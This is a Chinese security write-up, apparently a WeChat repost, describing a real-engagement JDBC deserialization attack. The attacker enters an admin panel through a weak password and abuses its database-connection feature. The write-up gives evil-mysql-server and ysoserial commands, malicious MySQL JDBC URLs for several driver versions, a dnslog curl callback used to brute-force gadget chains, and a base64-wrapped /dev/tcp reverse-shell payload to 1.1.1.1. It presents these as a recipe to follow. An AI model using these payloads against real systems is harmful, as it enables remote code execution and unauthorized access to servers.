前言:
项目中遇到一个JDBC反序列化的点,和同学交流之后也是拿下了这个点,记录一下也是对这个加深一下印象。
至于什么是JDBC反序列化可以自行去了解,该文章只是提供一下打的思路。
特征点:
获取一个弱口令进入后台:
看到了一个连接数据库的一个功能点,像实战中这种功能点都可以去尝试一下这个反序列化。
当时只知道可能会存在JDBC反序列化这么一个漏洞,但是自己没怎么打过,向同学了解之后,简单总结一下过程。
过程:
需要工具:
https://github.com/dushixiang/evil-mysql-server
https://github.com/frohoff/ysoserial服务端启动恶意mysql:
参考:
https://github.com/dushixiang/evil-mysql-server/blob/master/README-zh_CN.md
./evil-mysql-server -addr 3306 -java java -ysoserial ysoserial-all.jar确定mysql版本:
常用的payload如下:
5.1.11-5.x
jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections1_calc.exe6.x
jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections1_calc.exe8.x
jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections1_calc.exe这里解释一下username什么意思:
如图解释:yso_CommonsCollections1_calc.exe是选择CommonsCollections1这条链执行calc命令
这里随便选择一个payload打过去:注意这里username单独写,密码随意。
可以看到mysql版本为8.x,这样就能确定mysql版本了:
寻找反序列化链子:
前面确定mysql版本之后,要确定可打的链子是哪一条,这里同学也是给了一个思路,将ysoserial里面的payload作为一个字典,利用burp爆破,假设cc1可用,那么payload为:yso_CommonsCollections1_curl `echo CommonsCollections1`.objxwd.dnslog.cn,这样dnslog.cn就会回显CommonsCollections1字段,利用该思想对该链子进行爆破:
如图,选择该处的两个位置同时进行爆破,将ysoserial的链子作为字典:
最后爆出了可用的链子为cc6:
这样mysql版本确定了,可用链子也确定了,接下来就是构造恶意的payload打过去就行了:
反弹shell:
假设反弹地址为1.1.1.1:1234
反弹命令为:/bin/sh -i >& /dev/tcp/1.1.1.1/1234 0>&1
连接字符串:
jdbc:mysql://ip:端口/mysql?characterEncoding=utf8&useSSL=false&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=trueusername:
ysu_CommonsCollections6_bash -c {echo,反弹命令base64编码}|{base64,-d}|{bash,-i}直接打过去:
这里成功收到会话
总结:
对于可能第一次了解到这个漏洞理解可能比较困难,但是这里也提供了一个可以利用的点,当遇到这种功能点时,至少是能想到有这么一个东西,具体可以自行去了解,了解完之后在理解这篇文章就很容易了,思路过程写的也很清晰,照着这个过程来就行了。
原文始发于微信公众号(安全小子大杂烩):JDBC反序列化实战
